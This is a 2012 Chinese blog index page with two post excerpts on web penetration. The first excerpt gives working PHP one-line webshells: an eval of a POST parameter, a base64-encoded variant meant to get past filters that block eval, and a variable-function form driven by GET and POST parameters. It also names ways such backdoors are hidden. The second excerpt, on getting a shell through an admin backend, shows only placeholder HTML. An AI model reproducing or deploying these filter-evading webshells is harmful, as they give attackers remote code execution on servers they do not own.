2012年9月13日

php一句话猥琐流搞法

摘要: 在渗透中常常遇到拦截eval的,所以< ?php eval($_POST[xiao])?>这种形式的会被拦截常见的是变成base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4=)这种形式可以绕过,另外还有其他形式 < ?php $_GET['eval']($_POST['xiao']);?> 今天见一比较怪的东西:web杀毒。v1.0。点。心想是不是谁有跟云扯上了。 完了才知道是个webshell扫描工具。各位前辈把web后门弄的死去活来的,揍是怕人发现,压缩,加密,字符逆转,一句话,很烂了。 阅读全文

posted @ 2012-09-13 22:43 =_=! 阅读(345) 评论(0) 推荐(0) 编辑

后台单独生成php页面拿shell

摘要: <div id=”con660″> <div> <h4>业务领域</h4> <span>标题</span><br> <br> <span>标题2</span><br> <div>内容</div> <div>内容</div> <div>内容</div> <div>内容</div><br> </div> <div></div> 阅读全文

posted @ 2012-09-13 22:37 =_=! 阅读(238) 评论(0) 推荐(0) 编辑

导航